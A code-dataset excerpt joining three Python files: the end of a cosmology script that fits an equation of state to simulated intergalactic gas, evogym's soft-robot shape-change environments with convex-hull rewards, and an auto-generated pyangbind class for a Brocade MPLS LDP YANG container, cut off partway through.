#lonH1 = min(nH0(ind))
#hinH1 = max(nH0(ind))
#
#print,''
#print,'Temperature (K) at mean cosmic density'
#print,'Average temperature [K,log]:',avgT0,alog10(avgT0)
#print,'Median temperature [K,log]:',medT0,alog10(medT0)
#print,'Maximum temperature [K,log]:',hiT0,alog10(hiT0)
#print,'Minimum temperature [K,log]:',loT0,alog10(loT0)
#
#print
#print,'nH1/nH at mean cosmic density'
#print,'Mean log H1 abundance [nH1/nH,log]:',avgnH1,alog10(avgnH1)
#print,'Median log H1 abundance [nH1/nH,log]:',mednH1,alog10(mednH1)
#print,'Maximum log H1 abundance [nH1/nH,log]:',hinH1,alog10(hinH1)
#print,'Minimum log H1 abundance [nH1/nH,log]:',lonH1,alog10(lonH1)
#print
#
ind2 = np.where((overden > 0) * (overden < 1.5) )
tempfit = templog[ind2]
overdenfit = overden[ind2]
N += np.size(ind2)
#print, "Number of fitting points for equation of state", N
indm = np.where(metals < 1e-10)
metals[indm] = 1e-10
sx += np.sum(overdenfit)
sy += np.sum(tempfit)
sxx += np.sum(overdenfit*overdenfit)
sxy += np.sum(overdenfit*tempfit)
met += np.sum(mass[ind2]*metalic[ind2])
carb += np.sum(mass[ind2]*metals[ind2,2])
oxy += np.sum(mass[ind2]*metals[ind2,4])
totmet += np.sum(mass*metalic)
totmass += np.sum(mass)
totigmmass += np.sum(mass[ind2])
sym += np.sum(np.log10(metals[ind2,2]))
sxym += np.sum(overdenfit*np.log10(metals[ind2,2]))
# log T = log(T_0) + (gamma-1) log(rho/rho_0)
# and use least squares fit.
delta = (N*sxx)-(sx*sx)
a = ((sxx*sy) - (sx*sxy))/delta
b = ((N*sxy) - (sx*sy))/delta
amet = ((sxx*sym) - (sx*sxym))/delta
bmet = ((N*sxym) - (sx*sym))/delta
print num,": gamma", b+1.0," log(T0)", a," T0 (K)", (10.0)**a, "Metallicity: ", met/totigmmass,totmet/totmass, "[C/H,O/H]: ",carb/totigmmass, oxy/totigmmass,"(a_Z, b_Z): ",10**amet, bmet
raise Exception
return (redshift,10.0**a, b+1)
| en | 0.555534 | Module for finding an effective equation of state for in the Lyman-alpha forest from a snapshot. Ported to python from <NAME>'s IDL script. Reads in an HDF5 snapshot from the NE gadget version, fits a power law to the equation of state for low density, low temperature gas. Inputs: num - snapshot number base - Snapshot directory Outputs: (T_0, \gamma) - Effective equation of state parameters # Baryon density parameter #base="/home/spb41/data2/runs/bf2/" # Scaling factors and constants # Hydrogen fraction # N m^2 kg^-2 # J K^-1 # m # m # kg # kg # 100 km s^-1 Mpc^-1 in SI units # convert length to m #vscale = atime**0.5 # convert velocity to km s^-1 # convert mass to kg # convert density to kg m^-3 # convert energy/unit mass to J kg^-1 #print 'Reading file ',ffname #nH0=np.array(bar['NeutralHydrogenAbundance']) # Convert to physical SI units. Only energy and density considered here. # kg m^-3, ,physical # J kg^-1 ## Mean molecular weight #temp = mu/kB * (gamma-1) * u * mH #templog = alog10(temp) ##### Critical matter/energy density at z=0.0 # kg m^-3 ##### Mean hydrogen density of the Universe ##### Physical hydrogen number density #nH = rho * Xh / mH ### Hydrogen density as a fraction of the mean hydrogen density ### Calculates average/median temperature in a given overdensity range# #overden = rho/(rhoc *omegab) #ind = where(overden ge -0.01 and overden le 0.01) #avgT0 = mean(temp(ind)) #medT0 = median(temp(ind)) #loT0 = min(temp(ind)) #hiT0 = max(temp(ind)) # #avgnH1 = mean(nH0(ind)) #mednH1 = median(nH0(ind)) #lonH1 = min(nH0(ind)) #hinH1 = max(nH0(ind)) # #print,'' #print,'Temperature (K) at mean cosmic density' #print,'Average temperature [K,log]:',avgT0,alog10(avgT0) #print,'Median temperature [K,log]:',medT0,alog10(medT0) #print,'Maximum temperature [K,log]:',hiT0,alog10(hiT0) #print,'Minimum temperature [K,log]:',loT0,alog10(loT0) # #print #print,'nH1/nH at mean cosmic density' #print,'Mean log H1 abundance [nH1/nH,log]:',avgnH1,alog10(avgnH1) #print,'Median log H1 abundance [nH1/nH,log]:',mednH1,alog10(mednH1) #print,'Maximum log H1 abundance [nH1/nH,log]:',hinH1,alog10(hinH1) #print,'Minimum log H1 abundance [nH1/nH,log]:',lonH1,alog10(lonH1) #print # #print, "Number of fitting points for equation of state", N # log T = log(T_0) + (gamma-1) log(rho/rho_0) # and use least squares fit. | 2.664358 | 3 |
evogym/envs/change_shape.py | federico-camerota/evogym | 78 | 10314 |
import gym
from gym import error, spaces
from gym import utils
from gym.utils import seeding
from evogym import *
from evogym.envs import BenchmarkBase
import random
from math import *
import numpy as np
import os
class ShapeBase(BenchmarkBase):
def __init__(self, world):
super().__init__(world)
def reset(self):
super().reset()
# observation
obs = np.concatenate((
self.get_relative_pos_obs("robot"),
))
return obs
### ----------------------------------------------------------------------
# This section of code is modified from the following author
# from https://github.com/RodolfoFerro/ConvexHull
# Author: <NAME>
# Mail: <EMAIL>
# Script: Compute the Convex Hull of a set of points using the Graham Scan
# Function to know if we have a CCW turn
def CCW(self, p1, p2, p3):
if (p3[1]-p1[1])*(p2[0]-p1[0]) >= (p2[1]-p1[1])*(p3[0]-p1[0]):
return True
return False
# Main function:
def jarvis_march(self, S):
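        """Gift wrapping (Jarvis march): starting from the leftmost point, keep taking the most counter-clockwise endpoint until the hull closes."""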
n = len(S)
P = [None] * n
l = np.where(S[:,0] == np.min(S[:,0]))
pointOnHull = S[l[0][0]]
i = 0
while True:
P[i] = pointOnHull
endpoint = S[0]
for j in range(1,n):
if (endpoint[0] == pointOnHull[0] and endpoint[1] == pointOnHull[1]) or not self.CCW(S[j],P[i],endpoint):
endpoint = S[j]
i = i + 1
pointOnHull = endpoint
if endpoint[0] == P[0][0] and endpoint[1] == P[0][1]:
break
for i in range(n):
if P[-1] is None:
del P[-1]
return np.array(P)
### ----------------------------------------------------------------------
def convex_poly_area(self, pts_cw):
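        """Shoelace formula: signed area of a polygon given its vertices in clockwise order."""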
area = 0
for i in range(len(pts_cw)):
i_1 = i + 1
if i_1 >= len(pts_cw):
i_1 = 0
area += (pts_cw[i,0] * pts_cw[i_1,1] - pts_cw[i_1,0] * pts_cw[i,1])
return 0.5 * area
class MaximizeShape(ShapeBase):
def __init__(self, body, connections=None):
# make world
self.world = EvoWorld.from_json(os.path.join(self.DATA_PATH, 'ShapeChange.json'))
self.world.add_from_array('robot', body, 7, 1, connections=connections)
# init sim
ShapeBase.__init__(self, self.world)
# set action space and observation space
num_actuators = self.get_actuator_indices('robot').size
num_robot_points = self.object_pos_at_time(self.get_time(), "robot").size
        self.action_space = spaces.Box(low=0.6, high=1.6, shape=(num_actuators,), dtype=np.float64)
        self.observation_space = spaces.Box(low=-100.0, high=100.0, shape=(num_robot_points,), dtype=np.float64)
def step(self, action):
# collect pre step information
robot_pos_init = self.object_pos_at_time(self.get_time(), "robot")
# step
done = super().step({'robot': action})
# collect post step information
robot_pos_final = self.object_pos_at_time(self.get_time(), "robot")
# observation
obs = np.concatenate((
self.get_relative_pos_obs("robot"),
))
# compute reward
reward = self.get_reward(robot_pos_init, robot_pos_final)
# error check unstable simulation
if done:
print("SIMULATION UNSTABLE... TERMINATING")
reward -= 3.0
# observation, reward, has simulation met termination conditions, debugging info
return obs, reward, done, {}
def get_reward(self, robot_pos_init, robot_pos_final):
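        """Reward: change in the convex-hull area of the robot's point masses over the step, scaled by 10."""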
# find convex hull of initial state
convex_hull_init = self.jarvis_march(np.transpose(robot_pos_init))
area_init = self.convex_poly_area(convex_hull_init)
        # find convex hull of final state
convex_hull_final = self.jarvis_march(np.transpose(robot_pos_final))
area_final = self.convex_poly_area(convex_hull_final)
reward = (area_final - area_init) * 10
return reward
class MinimizeShape(ShapeBase):
def __init__(self, body, connections=None):
# make world
self.world = EvoWorld.from_json(os.path.join(self.DATA_PATH, 'ShapeChange.json'))
self.world.add_from_array('robot', body, 7, 1, connections=connections)
# init sim
ShapeBase.__init__(self, self.world)
# set action space and observation space
num_actuators = self.get_actuator_indices('robot').size
num_robot_points = self.object_pos_at_time(self.get_time(), "robot").size
        self.action_space = spaces.Box(low=0.6, high=1.6, shape=(num_actuators,), dtype=np.float64)
        self.observation_space = spaces.Box(low=-100.0, high=100.0, shape=(num_robot_points,), dtype=np.float64)
def step(self, action):
# collect pre step information
robot_pos_init = self.object_pos_at_time(self.get_time(), "robot")
# step
done = super().step({'robot': action})
# collect post step information
robot_pos_final = self.object_pos_at_time(self.get_time(), "robot")
# observation
obs = np.concatenate((
self.get_relative_pos_obs("robot"),
))
# compute reward
reward = self.get_reward(robot_pos_init, robot_pos_final)
# error check unstable simulation
if done:
print("SIMULATION UNSTABLE... TERMINATING")
reward -= 3.0
# observation, reward, has simulation met termination conditions, debugging info
return obs, reward, done, {}
def get_reward(self, robot_pos_init, robot_pos_final):
# find convex hull of initial state
convex_hull_init = self.jarvis_march(np.transpose(robot_pos_init))
area_init = self.convex_poly_area(convex_hull_init)
        # find convex hull of final state
convex_hull_final = self.jarvis_march(np.transpose(robot_pos_final))
area_final = self.convex_poly_area(convex_hull_final)
reward = (area_init - area_final) * 10
return reward
class MaximizeXShape(ShapeBase):
def __init__(self, body, connections=None):
# make world
self.world = EvoWorld.from_json(os.path.join(self.DATA_PATH, 'ShapeChange.json'))
self.world.add_from_array('robot', body, 7, 1, connections=connections)
# init sim
ShapeBase.__init__(self, self.world)
# set action space and observation space
num_actuators = self.get_actuator_indices('robot').size
num_robot_points = self.object_pos_at_time(self.get_time(), "robot").size
        self.action_space = spaces.Box(low=0.6, high=1.6, shape=(num_actuators,), dtype=np.float64)
        self.observation_space = spaces.Box(low=-100.0, high=100.0, shape=(num_robot_points,), dtype=np.float64)
def step(self, action):
# collect pre step information
robot_pos_init = self.object_pos_at_time(self.get_time(), "robot")
# step
done = super().step({'robot': action})
# collect post step information
robot_pos_final = self.object_pos_at_time(self.get_time(), "robot")
# observation
obs = np.concatenate((
self.get_relative_pos_obs("robot"),
))
# compute reward
reward = self.get_reward(robot_pos_init, robot_pos_final)
# error check unstable simulation
if done:
print("SIMULATION UNSTABLE... TERMINATING")
reward -= 3.0
# observation, reward, has simulation met termination conditions, debugging info
return obs, reward, done, {}
def get_reward(self, robot_pos_init, robot_pos_final):
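        """Reward: change in the robot's horizontal (x-axis) extent between the start and end of the step."""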
robot_min_pos_init = np.min(robot_pos_init, axis=1)
robot_max_pos_init = np.max(robot_pos_init, axis=1)
robot_min_pos_final = np.min(robot_pos_final, axis=1)
robot_max_pos_final = np.max(robot_pos_final, axis=1)
span_final = (robot_max_pos_final[0] - robot_min_pos_final[0])
span_initial = (robot_max_pos_init[0] - robot_min_pos_init[0])
reward = (span_final - span_initial)
return reward
class MaximizeYShape(ShapeBase):
def __init__(self, body, connections=None):
# make world
self.world = EvoWorld.from_json(os.path.join(self.DATA_PATH, 'ShapeChange.json'))
self.world.add_from_array('robot', body, 7, 1, connections=connections)
# init sim
ShapeBase.__init__(self, self.world)
# set action space and observation space
num_actuators = self.get_actuator_indices('robot').size
num_robot_points = self.object_pos_at_time(self.get_time(), "robot").size
        self.action_space = spaces.Box(low=0.6, high=1.6, shape=(num_actuators,), dtype=np.float64)
        self.observation_space = spaces.Box(low=-100.0, high=100.0, shape=(num_robot_points,), dtype=np.float64)
def step(self, action):
# collect pre step information
robot_pos_init = self.object_pos_at_time(self.get_time(), "robot")
# step
done = super().step({'robot': action})
# collect post step information
robot_pos_final = self.object_pos_at_time(self.get_time(), "robot")
# observation
obs = np.concatenate((
self.get_relative_pos_obs("robot"),
))
# compute reward
reward = self.get_reward(robot_pos_init, robot_pos_final)
# error check unstable simulation
if done:
print("SIMULATION UNSTABLE... TERMINATING")
reward -= 3.0
# observation, reward, has simulation met termination conditions, debugging info
return obs, reward, done, {}
def get_reward(self, robot_pos_init, robot_pos_final):
robot_min_pos_init = np.min(robot_pos_init, axis=1)
robot_max_pos_init = np.max(robot_pos_init, axis=1)
robot_min_pos_final = np.min(robot_pos_final, axis=1)
robot_max_pos_final = np.max(robot_pos_final, axis=1)
span_final = (robot_max_pos_final[1] - robot_min_pos_final[1])
span_initial = (robot_max_pos_init[1] - robot_min_pos_init[1])
reward = (span_final - span_initial)
return reward
pybind/slxos/v16r_1_00b/mpls_state/ldp/fec/ldp_fec_prefixes/__init__.py | shivharis/pybind | 0 | 10315 |
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
import prefix
import key
class ldp_fec_prefixes(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-mpls-operational - based on the path /mpls-state/ldp/fec/ldp-fec-prefixes. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description:
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__tot_no_of_prefix_fec','__tot_no_of_prefix_fec_installed','__tot_no_of_prefix_fec_filtered','__tot_no_of_prefix_fec_lwd','__filtered','__prefix_filtered','__prefix','__key',)
_yang_name = 'ldp-fec-prefixes'
_rest_name = 'ldp-fec-prefixes'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__prefix_filtered = YANGDynClass(base=unicode, is_leaf=True, yang_name="prefix-filtered", rest_name="prefix-filtered", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
self.__tot_no_of_prefix_fec_installed = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec-installed", rest_name="tot-no-of-prefix-fec-installed", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
self.__tot_no_of_prefix_fec = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec", rest_name="tot-no-of-prefix-fec", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
self.__prefix = YANGDynClass(base=YANGListType("destination",prefix.prefix, yang_name="prefix", rest_name="prefix", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='destination', extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix', u'cli-suppress-show-path': None}}), is_container='list', yang_name="prefix", rest_name="prefix", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
self.__tot_no_of_prefix_fec_lwd = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec-lwd", rest_name="tot-no-of-prefix-fec-lwd", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
self.__key = YANGDynClass(base=key.key, is_container='container', presence=False, yang_name="key", rest_name="key", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-key-key-1'}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
self.__filtered = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'filtered': {'value': 1}, u'filtered-in': {'value': 2}, u'filtered-out': {'value': 3}},), is_leaf=True, yang_name="filtered", rest_name="filtered", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='fec-filter-type', is_config=False)
self.__tot_no_of_prefix_fec_filtered = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec-filtered", rest_name="tot-no-of-prefix-fec-filtered", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'mpls-state', u'ldp', u'fec', u'ldp-fec-prefixes']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'mpls-state', u'ldp', u'fec', u'ldp-fec-prefixes']
def _get_tot_no_of_prefix_fec(self):
"""
Getter method for tot_no_of_prefix_fec, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/tot_no_of_prefix_fec (uint32)
YANG Description: tot_no_of_prefix_fec
"""
return self.__tot_no_of_prefix_fec
def _set_tot_no_of_prefix_fec(self, v, load=False):
"""
Setter method for tot_no_of_prefix_fec, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/tot_no_of_prefix_fec (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_tot_no_of_prefix_fec is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_tot_no_of_prefix_fec() directly.
YANG Description: tot_no_of_prefix_fec
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec", rest_name="tot-no-of-prefix-fec", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """tot_no_of_prefix_fec must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec", rest_name="tot-no-of-prefix-fec", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)""",
})
self.__tot_no_of_prefix_fec = t
if hasattr(self, '_set'):
self._set()
def _unset_tot_no_of_prefix_fec(self):
self.__tot_no_of_prefix_fec = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec", rest_name="tot-no-of-prefix-fec", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
def _get_tot_no_of_prefix_fec_installed(self):
"""
Getter method for tot_no_of_prefix_fec_installed, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/tot_no_of_prefix_fec_installed (uint32)
YANG Description: tot_no_of_prefix_fec_installed
"""
return self.__tot_no_of_prefix_fec_installed
def _set_tot_no_of_prefix_fec_installed(self, v, load=False):
"""
Setter method for tot_no_of_prefix_fec_installed, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/tot_no_of_prefix_fec_installed (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_tot_no_of_prefix_fec_installed is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_tot_no_of_prefix_fec_installed() directly.
YANG Description: tot_no_of_prefix_fec_installed
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec-installed", rest_name="tot-no-of-prefix-fec-installed", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """tot_no_of_prefix_fec_installed must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec-installed", rest_name="tot-no-of-prefix-fec-installed", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)""",
})
self.__tot_no_of_prefix_fec_installed = t
if hasattr(self, '_set'):
self._set()
def _unset_tot_no_of_prefix_fec_installed(self):
self.__tot_no_of_prefix_fec_installed = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec-installed", rest_name="tot-no-of-prefix-fec-installed", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
def _get_tot_no_of_prefix_fec_filtered(self):
"""
Getter method for tot_no_of_prefix_fec_filtered, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/tot_no_of_prefix_fec_filtered (uint32)
YANG Description: tot_no_of_prefix_fec_filtered
"""
return self.__tot_no_of_prefix_fec_filtered
def _set_tot_no_of_prefix_fec_filtered(self, v, load=False):
"""
Setter method for tot_no_of_prefix_fec_filtered, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/tot_no_of_prefix_fec_filtered (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_tot_no_of_prefix_fec_filtered is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_tot_no_of_prefix_fec_filtered() directly.
YANG Description: tot_no_of_prefix_fec_filtered
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec-filtered", rest_name="tot-no-of-prefix-fec-filtered", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """tot_no_of_prefix_fec_filtered must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec-filtered", rest_name="tot-no-of-prefix-fec-filtered", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)""",
})
self.__tot_no_of_prefix_fec_filtered = t
if hasattr(self, '_set'):
self._set()
def _unset_tot_no_of_prefix_fec_filtered(self):
self.__tot_no_of_prefix_fec_filtered = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec-filtered", rest_name="tot-no-of-prefix-fec-filtered", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
def _get_tot_no_of_prefix_fec_lwd(self):
"""
Getter method for tot_no_of_prefix_fec_lwd, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/tot_no_of_prefix_fec_lwd (uint32)
YANG Description: tot_no_of_prefix_fec_lwd
"""
return self.__tot_no_of_prefix_fec_lwd
def _set_tot_no_of_prefix_fec_lwd(self, v, load=False):
"""
Setter method for tot_no_of_prefix_fec_lwd, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/tot_no_of_prefix_fec_lwd (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_tot_no_of_prefix_fec_lwd is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_tot_no_of_prefix_fec_lwd() directly.
YANG Description: tot_no_of_prefix_fec_lwd
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec-lwd", rest_name="tot-no-of-prefix-fec-lwd", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """tot_no_of_prefix_fec_lwd must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec-lwd", rest_name="tot-no-of-prefix-fec-lwd", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)""",
})
self.__tot_no_of_prefix_fec_lwd = t
if hasattr(self, '_set'):
self._set()
def _unset_tot_no_of_prefix_fec_lwd(self):
self.__tot_no_of_prefix_fec_lwd = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec-lwd", rest_name="tot-no-of-prefix-fec-lwd", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
def _get_filtered(self):
"""
Getter method for filtered, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/filtered (fec-filter-type)
YANG Description: Filter Type
"""
return self.__filtered
def _set_filtered(self, v, load=False):
"""
Setter method for filtered, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/filtered (fec-filter-type)
If this variable is read-only (config: false) in the
source YANG file, then _set_filtered is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_filtered() directly.
YANG Description: Filter Type
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'filtered': {'value': 1}, u'filtered-in': {'value': 2}, u'filtered-out': {'value': 3}},), is_leaf=True, yang_name="filtered", rest_name="filtered", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='fec-filter-type', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """filtered must be of a type compatible with fec-filter-type""",
'defined-type': "brocade-mpls-operational:fec-filter-type",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'filtered': {'value': 1}, u'filtered-in': {'value': 2}, u'filtered-out': {'value': 3}},), is_leaf=True, yang_name="filtered", rest_name="filtered", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='fec-filter-type', is_config=False)""",
})
self.__filtered = t
if hasattr(self, '_set'):
self._set()
def _unset_filtered(self):
